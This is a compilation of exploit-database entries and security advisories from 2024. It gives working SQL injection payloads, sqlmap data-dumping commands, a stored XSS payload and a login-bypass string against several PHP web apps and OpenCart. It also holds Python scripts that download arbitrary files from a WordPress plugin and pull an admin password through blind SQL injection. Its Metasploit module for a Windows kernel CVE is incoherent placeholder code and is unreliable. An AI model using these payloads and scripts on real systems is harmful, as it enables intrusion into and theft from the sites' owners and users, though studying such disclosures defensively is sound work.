Daily Habit Tracker version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Daily Habit Tracker 1.0 - SQL Injection# Date: 2 Feb 2024# Exploit Author: Yevhenii Butenko# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html# Version: 1.0# Tested on: Debian# CVE : CVE-2024-24495### SQL Injection:> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.### Affected Components:> delete-tracker.php### Description:> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.## Proof of Concept:### Manual ExploitationThe payload `'"";SELECT SLEEP(5)#` can be employed to force the database to sleep for 5 seconds:```GET /habit-tracker/endpoint/delete-tracker.php?tracker=5'""%3bSELECT+SLEEP(5)%23 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1```![5 seconds delay](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/sqli.png?raw=true)### SQLMapSave the following request to `delete_tracker.txt`:```GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1```Use `sqlmap` with `-r` option to exploit the vulnerability:```sqlmap -r ./delete_tracker.txt --level 5 --risk 3 --batch --technique=T --dump```## RecommendationsWhen using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.

Daily Habit Tracker 1.0 SQL Injection

Daily Habit Tracker version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS)# Date: 2 Feb 2024# Exploit Author: Yevhenii Butenko# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html# Version: 1.0# Tested on: Debian# CVE : CVE-2024-24494### Stored Cross-Site Scripting (XSS):> Stored Cross-Site Scripting (XSS) is a web security vulnerability where an attacker injects malicious scripts into a web application's database. The malicious script is saved on the server and later rendered in other users' browsers. When other users access the affected page, the stored script executes, potentially stealing data or compromising user security.### Affected Components:> add-tracker.php, update-tracker.phpVulnerable parameters: - day - exercise - pray - read_book - vitamins - laundry - alcohol - meat### Description:> Multiple parameters within `Add Tracker` and `Update Tracker` requests are vulnerable to Stored Cross-Site Scripting. The application failed to sanitize user input while storing it to the database and reflecting back on the page.## Proof of Concept:The following payload `<script>alert('STORED_XSS')</script>` can be used in order to exploit the vulnerability.Below is an example of a request demonstrating how a malicious payload can be stored within the `day` value:```POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 175Origin: http://localhostDNT: 1Connection: closeReferer: http://localhost/habit-tracker/home.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1date=1992-01-12&day=Tuesday%3Cscript%3Ealert%28%27STORED_XSS%27%29%3C%2Fscript%3E&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes```![XSS Fired](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/xss.png?raw=true)## RecommendationsWhen using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.

Daily Habit Tracker 1.0 Cross Site Scripting

Employee Management System version 1.0 suffers from additional remote SQL injection vulnerabilities. Original discovery of this finding is attributed to Ozlem Balci in January of 2024.

    # Exploit Title: Employee Management System 1.0 - `txtfullname` and `txtphone` SQL Injection# Date: 2 Feb 2024# Exploit Author: Yevhenii Butenko# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html# Version: 1.0# Tested on: Debian# CVE : CVE-2024-24499### SQL Injection:> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.### Affected Components:> /employee_akpoly/Admin/edit_profile.php> Two parameters `txtfullname` and `txtphone` within admin edit profile mechanism are vulnerable to SQL Injection.![txtfullname](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_edit_txtfullname_sqli.png?raw=true)![txtphone](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_edit_txtphone_sqli.png?raw=true)### Description:> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.## Proof of Concept:### SQLMapSave the following request to `edit_profile.txt`:```POST /employee_akpoly/Admin/edit_profile.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 88Origin: http://localhostConnection: closeReferer: http://localhost/employee_akpoly/Admin/edit_profile.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1txtfullname=Caroline+Bassey&txtphone=0905656&old_image=uploadImage%2Fbird.jpg&btnupdate=```Use `sqlmap` with `-r` option to exploit the vulnerability:```sqlmap -r edit_profile.txt --level 5 --risk 3 --batch --dbms MYSQL --dump```## RecommendationsWhen using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.------------------------# Exploit Title: Employee Management System 1.0 - `txtusername` and `txtpassword` SQL Injection (Admin Login)# Date: 2 Feb 2024# Exploit Author: Yevhenii Butenko# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html# Version: 1.0# Tested on: Debian# CVE : CVE-2024-24497### SQL Injection:> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.### Affected Components:> /employee_akpoly/Admin/login.php> Two parameters `txtusername` and `txtpassword` within admin login mechanism are vulnerable to SQL Injection.![txtusername](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_login_txtusername_sqli.png?raw=true)![txtpassword](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_login_txtpassword_sqli.png?raw=true)### Description:> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.## Proof of Concept:### Manual ExploitationThe payload `' and 1=1-- -` can be used to bypass authentication within admin login page.```POST /employee_akpoly/Admin/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 61Origin: http://localhostConnection: closeReferer: http://localhost/employee_akpoly/Admin/login.phpCookie: PHPSESSID=lcb84k6drd2tepn90ehe7p9n20Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1txtusername=admin' and 1=1-- -&txtpassword=password&btnlogin=```### SQLMapSave the following request to `admin_login.txt`:```POST /employee_akpoly/Admin/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 62Origin: http://localhostConnection: closeReferer: http://localhost/employee_akpoly/Admin/login.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1txtusername=admin&txtpassword=password&btnlogin=```Use `sqlmap` with `-r` option to exploit the vulnerability:```sqlmap -r admin_login.txt --level 5 --risk 3 --batch --dbms MYSQL --dump```## RecommendationsWhen using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.

Employee Management System 1.0 SQL Injection

WordPress Simple Backup plugin versions prior to 2.7.10 suffer from file download and path traversal vulnerabilities.

    # Exploit Title: Simple Backup Plugin < 2.7.10 - Arbitrary File Download via Path Traversal# Date: 2024-03-06# Exploit Author: Ven3xy# Software Link: https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip# Version: 2.7.10# Tested on: Linuximport sysimport requestsfrom urllib.parse import urljoinimport timedef exploit(target_url, file_name, depth):    traversal = '../' * depth    exploit_url = urljoin(target_url, '/wp-admin/tools.php')    params = {        'page': 'backup_manager',        'download_backup_file': f'{traversal}{file_name}'    }    response = requests.get(exploit_url, params=params)    if response.status_code == 200 and response.headers.get('Content-Disposition') \            and 'attachment; filename' in response.headers['Content-Disposition'] \            and response.headers.get('Content-Length') and int(response.headers['Content-Length']) > 0:        print(response.text)  # Replace with the desired action for the downloaded content        file_path = f'simplebackup_{file_name}'        with open(file_path, 'wb') as file:            file.write(response.content)        print(f'File saved in: {file_path}')    else:        print("Nothing was downloaded. You can try to change the depth parameter or verify the correct filename.")if __name__ == "__main__":    if len(sys.argv) != 4:        print("Usage: python exploit.py <target_url> <file_name> <depth>")        sys.exit(1)    target_url = sys.argv[1]    file_name = sys.argv[2]    depth = int(sys.argv[3])    print("\n[+] Exploit Coded By - Venexy    ||    Simple Backup Plugin 2.7.10  EXPLOIT\n\n")    time.sleep(5)    exploit(target_url, file_name, depth)

WordPress Simple Backup Path Traversal / Arbitrary File Download

OpenCart Core version 4.0.2.3 suffers from a remote SQL injection vulnerability.

    # Exploit Title: OpenCart Core 4.0.2.3 - 'search' SQLi# Date: 2024-04-2# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.opencart.com/# Software Link: https://github.com/opencart/opencart/releases# Version: 4.0.2.3# Tested on: XAMPP, Linux# Contact: https://twitter.com/dmaral3noz* Description :Opencart allows SQL Injection via parameter 'search' in /index.php?route=product/search&search=.Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.* Steps to Reproduce :- Go to : http://127.0.0.1/index.php?route=product/search&search=test- New Use command Sqlmap : sqlmap -u "http://127.0.0.1/index.php?route=product/search&search=#1" --level=5 --risk=3 -p search --dbs===========Output :Parameter: search (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: route=product/search&search=') AND 2427=2427-- drCaType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: route=product/search&search=') AND (SELECT 8368 FROM (SELECT(SLEEP(5)))uUDJ)-- Nabb

OpenCart Core 4.0.2.3 SQL Injection

Online Hotel Booking in PHP version 1.0 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title:  Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated)# Google Dork: n/a# Date: 04/02/2024# Exploit Author: Gian Paris C. Agsam# Vendor Homepage: https://github.com/projectworldsofficial# Software Link: https://projectworlds.in/wp-content/uploads/2019/06/hotel-booking.zip# Version: 1.0# Tested on: Apache/2.4.58 (Debian) / PHP 8.2.12# CVE : n/aimport requestsimport argparsefrom colorama import (Fore as F, Back as B, Style as S)BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB,FW = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT,F.WHITErequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}parser = argparse.ArgumentParser(description='Exploit Blind SQL Injection')parser.add_argument('-u', '--url', help='')args = parser.parse_args()def banner():    print(f"""{FR}      ·▄▄▄·▄▄▄.▄▄ · ▄▄▄ . ▄▄· ·▄▄▄▄  ▄▄▄        ▪  ·▄▄▄▄  ▪     ▐▄▄·▐▄▄·▐█ ▀. ▀▄.▀·▐█ ▌▪██▪ ██ ▀▄ █·▪     ██ ██▪ ██  ▄█▀▄ ██▪ ██▪ ▄▀▀▀█▄▐▀▀▪▄██ ▄▄▐█· ▐█▌▐▀▀▄  ▄█▀▄ ▐█·▐█· ▐█▌▐█▌.▐▌██▌.██▌.▐█▄▪▐█▐█▄▄▌▐███▌██. ██ ▐█•█▌▐█▌.▐▌▐█▌██. ██  ▀█▄▀▪▀▀▀ ▀▀▀  ▀▀▀▀  ▀▀▀ ·▀▀▀ ▀▀▀▀▀• .▀  ▀ ▀█▄▀▪▀▀▀▀▀▀▀▀•         Github: https://github.com/offensive-droid         {FW}    """)# Define the characters to testchars = [    'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o',    'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D',    'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S',    'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7',    '8', '9', '@', '#']def sqliPayload(char, position, userid, column, table):    sqli = 'admin\' UNION SELECT IF(SUBSTRING('    sqli += str(column) + ','    sqli += str(position) + ',1) = \''    sqli += str(char) + '\',sleep(3),null) FROM '    sqli += str(table) + ' WHERE uname="admin"\''    return sqlidef postRequest(URL, sqliReq, char, position):    sqliURL = URL    params = {"emailusername": "admin", "password": sqliReq, "submit": "Login"}    req = requests.post(url=sqliURL, data=params, verify=False, proxies=proxies, timeout=10)    if req.elapsed.total_seconds() >= 2:        print("{} : {}".format(char, req.elapsed.total_seconds()))        return char    return ''def theHarvester(target, CHARS, url):    #print("Retrieving: {} {} {}".format(target['table'], target['column'], target['id']))    print("Retrieving admin password".format(target['table'], target['column'], target['id']))    position = 1    full_pass = ""    while position < 5:        for char in CHARS:            sqliReq = sqliPayload(char, position, target['id'], target['column'], target['table'])            found_char = postRequest(url, sqliReq, char, position)            full_pass += found_char        position += 1    return full_passif __name__ == "__main__":    banner()    HOST = str(args.url)    PATH = HOST + "/hotel booking/admin/login.php"    adminPassword = {"id": "1", "table": "manager", "column": "upass"}    adminPass = theHarvester(adminPassword, chars, PATH)    print("Admin Password:", adminPass)

Online Hotel Booking In PHP 1.0 SQL Injection

ASUS Control Center Express version 01.06.15 suffers from an unquoted service path vulnerability.

    # Exploit Title: ASUS Control Center Express 01.06.15 - Unquoted Service PathPrivilege Escalation# Date: 2024-04-02# Exploit Author: Alaa Kachouh# Vendor Homepage:https://www.asus.com/campaign/ASUS-Control-Center-Express/global/# Version: Up to 01.06.15# Tested on: Windows# CVE: CVE-2024-27673===================================================================ASUS Control Center Express Version =< 01.06.15 contains an unquotedservice path which allows attackers to escalate privileges to the systemlevel.Assuming attackers have write access to C:\, the attackers can abuse theAsus service "Apro console service"/apro_console.exe which upon restartingwill invoke C:\Program.exe with SYSTEM privileges.The binary path of the service alone isn't susceptible, but upon itsinitiation, it will execute C:\program.exe as SYSTEM.Service Name: AProConsoleServicebinary impacted: apro_console.exe# If a malicious payload is inserted into C:\  and service is executed inany way, this can grant privileged access to the system and performmalicious activities.

ASUS Control Center Express 01.06.15 Unquoted Service Path

For an attacker with pre-existing access to send a signal to a workflow, the attacker can make the signal name a script that executes when a victim views that signal. The XSS is in the timeline page displaying the workflow execution details of the workflow that was sent the crafted signal.
Access to send a signal to a workflow is determined by how you configured the authorizer on your server. This includes any entity with permission to directly call SignalWorkflowExecution or SignalWithStartWorkflowExecution, or any entity can deploy a worker that has access to call workflow progress APIs (specifically RespondWorkflowTaskCompleted).


1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-2435

**Temporal UI Server cross-site scripting vulnerability**

Moderate severity GitHub Reviewed Published Apr 2, 2024 to the GitHub Advisory Database • Updated Apr 2, 2024

**Package**

gomod github.com/temporalio/ui-server/v2 (Go)

**Affected versions**

< 2.25.0

For an attacker with pre-existing access to send a signal to a workflow, the attacker can make the signal name a script that executes when a victim views that signal. The XSS is in the timeline page displaying the workflow execution details of the workflow that was sent the crafted signal.  
Access to send a signal to a workflow is determined by how you configured the authorizer on your server. This includes any entity with permission to directly call SignalWorkflowExecution or SignalWithStartWorkflowExecution, or any entity can deploy a worker that has access to call workflow progress APIs (specifically RespondWorkflowTaskCompleted).

**References**

*   https://nvd.nist.gov/vuln/detail/CVE-2024-2435
*   https://github.com/temporalio/ui-server/releases/tag/v2.25.0

Published to the GitHub Advisory Database

Apr 2, 2024

GHSA-8f25-w7qj-r7hc: Temporal UI Server cross-site scripting vulnerability

Microsoft Windows version 10.0.17763.5458 kernel IOCTL privilege escalation exploit.

    ############################################## Exploit Title :  EXPLOIT Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability CVE-2024-21338 ### This module requires Metasploit: https://metasploit.com/download## Author : E1.Coders ## ## Contact : E1.Coders [at] Mail [dot] RU ## ## Security Risk : High ## ## ############################################## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote  Rank = NormalRanking   include Msf::Exploit::Remote::DCERPC  include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact   def initialize(info = {})    super(      update_info(        info,        'Name' => 'CVE-2024-21338 Exploit',        'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.',        'Author' => 'You',        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2024-21338']        ]      )    )     register_options(      [        OptString.new('RHOST', [true, 'The target address', '127.0.0.1']),        OptPort.new('RPORT', [true, 'The target port', 1234])      ]    )  end   def check    connect     begin      impacket_artifact(dcerpc_binding('ncacn_ip_tcp'), 'FooBar')    rescue Rex::Post::Meterpreter::RequestError      return Exploit::CheckCode::Safe    end     Exploit::CheckCode::Appears  end   def exploit    connect     begin      impacket_artifact(        dcerpc_binding('ncacn_ip_tcp'),        'FooBar',        datastore['FooBarPayload']      )    rescue Rex::Post::Meterpreter::RequestError      fail_with Failure::UnexpectedReply, 'Unexpected response from impacket_artifact'    end     handler    disconnect  endend  #refrence :  https://nvd.nist.gov/vuln/detail/CVE-2024-21338

Microsoft Windows 10.0.17763.5458 Privilege Escalation

The authentication service of the extension does not verify the OpenID Connect authentication state from the user lookup chain. Instead, the authentication service authenticates every valid frontend user from the user lookup chain, where the  frontend user field “tx_oidc” is not empty.

In scenarios, where either ext:felogin is active or where `$GLOBALS['TYPO3_CONF_VARS'][‘FE’][‘checkFeUserPid’]` is disabled, an attacker can login to OpenID Connect frontend user accounts by providing a valid username and any password. 

**OpenID Connect Authentication (oidc) Typo3 extension Authentication Bypass**

Moderate severity GitHub Reviewed Published Apr 2, 2024 to the GitHub Advisory Database • Updated Apr 2, 2024

**Package**

composer causal/oidc (Composer)

**Affected versions**

< 2.1.0

**Patched versions**

2.1.0

**Description**

The authentication service of the extension does not verify the OpenID Connect authentication state from the user lookup chain. Instead, the authentication service authenticates every valid frontend user from the user lookup chain, where the frontend user field “tx\_oidc” is not empty.

In scenarios, where either ext:felogin is active or where $GLOBALS['TYPO3_CONF_VARS'][‘FE’][‘checkFeUserPid’] is disabled, an attacker can login to OpenID Connect frontend user accounts by providing a valid username and any password.

**References**

*   https://github.com/FriendsOfPHP/security-advisories/blob/master/causal/oidc/CVE-2024-30173.yaml
*   https://typo3.org/security/advisory/typo3-ext-sa-2024-002

Published to the GitHub Advisory Database

Apr 2, 2024

Reviewed

Apr 2, 2024

Last updated

Apr 2, 2024

**Severity**

Moderate

6.0

/ 10

**CVSS base metrics**

Attack vector

Network

Attack complexity

High

Privileges required

None

User interaction

None

Scope

Unchanged

Confidentiality

High

Integrity

Low

Availability

None

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N/E:F/RL:O/RC:C

**Weaknesses**

CWE-284

**CVE ID**

CVE-2024-30173

**GHSA ID**

GHSA-hhf8-f5w9-g6vh

**Source code**

xperseguers/t3ext-oidc

Checking history

See something to contribute? Suggest improvements for this vulnerability.

Tag

#vulnerability